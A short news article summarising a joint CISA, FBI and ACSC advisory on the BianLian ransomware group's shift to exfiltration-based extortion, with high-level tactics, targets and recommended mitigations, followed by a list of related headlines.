BianLian Ransomware Group Shifts to Data Exfiltration-Based Extortion Tactics
Introduction
The US Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Australian Cyber Security Centre (ACSC) have issued an advisory warning organizations about the ransomware developer and data extortion group, BianLian. The group has been active since 2022, and has shifted its attack methods from encryption-based extortion to data exfiltration-based extortion.
BianLian‘s Tactics
BianLian is known for using a double-extortion model, where it encrypts victims’ systems and steals data, threatening to release the acquired data if the payment is not received. However, in the past few months, it has shifted its attack strategy to exfiltration-based extortion. The group uses stolen remote desktop protocol (RDP) credentials to access victims’ networks, and then moves around the network using open-source tools and command-line scripting. Once it has exfiltrated the data using File Transfer Protocol (FTP), Rclone, or Mega, it goes on to extort its victims.
BianLian‘s Targets
BianLian has targeted critical infrastructure organizations in the US and Australia, as well as professional services and property development organizations. Cybersecurity service provider [redacted] released research on the group in March, detailing its high-level operational security and skill penetration, as well as its continued growth while operating as a ransomware organization.
Response from Cybersecurity Experts
Tom Kellerman, Senior Vice President of Cyberstrategy at Contrast Security, stated that “More often than not, extortion via data leak is the modus operandi of choice.” He believes that this shift is due to the successful collaboration between law enforcement and the cyber community to not only decrypt the ransomware but also disrupt the infrastructure that sustains it.
Recommendations
CISA has urged organizations to implement the mitigations provided in the advisory to prevent these types of attacks. These mitigations include auditing remote access tools, reviewing logs for execution of remote access software, and enabling enhanced PowerShell logging. Organizations must also remain vigilant in ensuring that their employees are not using weak passreplaces, as this is often how attackers gain access to networks.
Conclusion
BianLian‘s shift towards data exfiltration-based extortion tactics highlights the need for organizations to focus on securing their data in addition to protecting against ransomware attacks. It is essential that organizations take proactive measures to protect themselves against these types of attacks, and work closely with cybersecurity experts to develop robust security measures to safeguard their networks and data. Moreover, organizations must regularly raise awareness among employees about the latest cyber threats and deploy the latest security tools and technologies to stay ahead of the ever-evolving threat landscape.
<< photo by Markus Spiske >>
You might want to read !
- “Rising Concerns as Hackers Sell Access to Critical Energy Sector ICS/OT Systems on Dark Web Marketplaces”
- “Cybersecurity Ascends to Boardroom Status, Leading to Robust Security Strategies”
- Cyberattack on Philly’s Leading Newspaper: Inside Story and Fallout.
- “Zoom Executives’ Role in Censoring Chinese Activists Revealed”
- “Behind the Scenes of the Russian Ransomware Perp Facing Charges for Targeting High-Profile Victims: Hive, Babuk & LockBit”
- Qilin Ransomware Gang Provides Affiliates with Efficient and Polished Cyberattacks.
- Strengthening Your Security Measures: A Guide to Protecting Your Organization from Vulnerabilities
- “Insights from RSAC Innovation Sandbox Judge: Exploring the Evolution of Cybersecurity Innovation”
- BianLian Ransomware Poses Threat to Critical Infrastructure Organizations
- “Uncovering the Teltonika Vulnerabilities That Put Industrial Organizations at Risk of Remote Attacks”
- The Alarming Rate of Microsoft Advisories: What It Means for Users and Businesses
- “Houthi-Backed Spyware Campaign Puts Yemeni Aid Workers Under Surveillance”
- “Cyber Threat Group Exploits Azure Serial Console for Complete Virtual Machine Hijacking”
- US Offers Record $10M Reward for Information on Russian Ransomware Suspect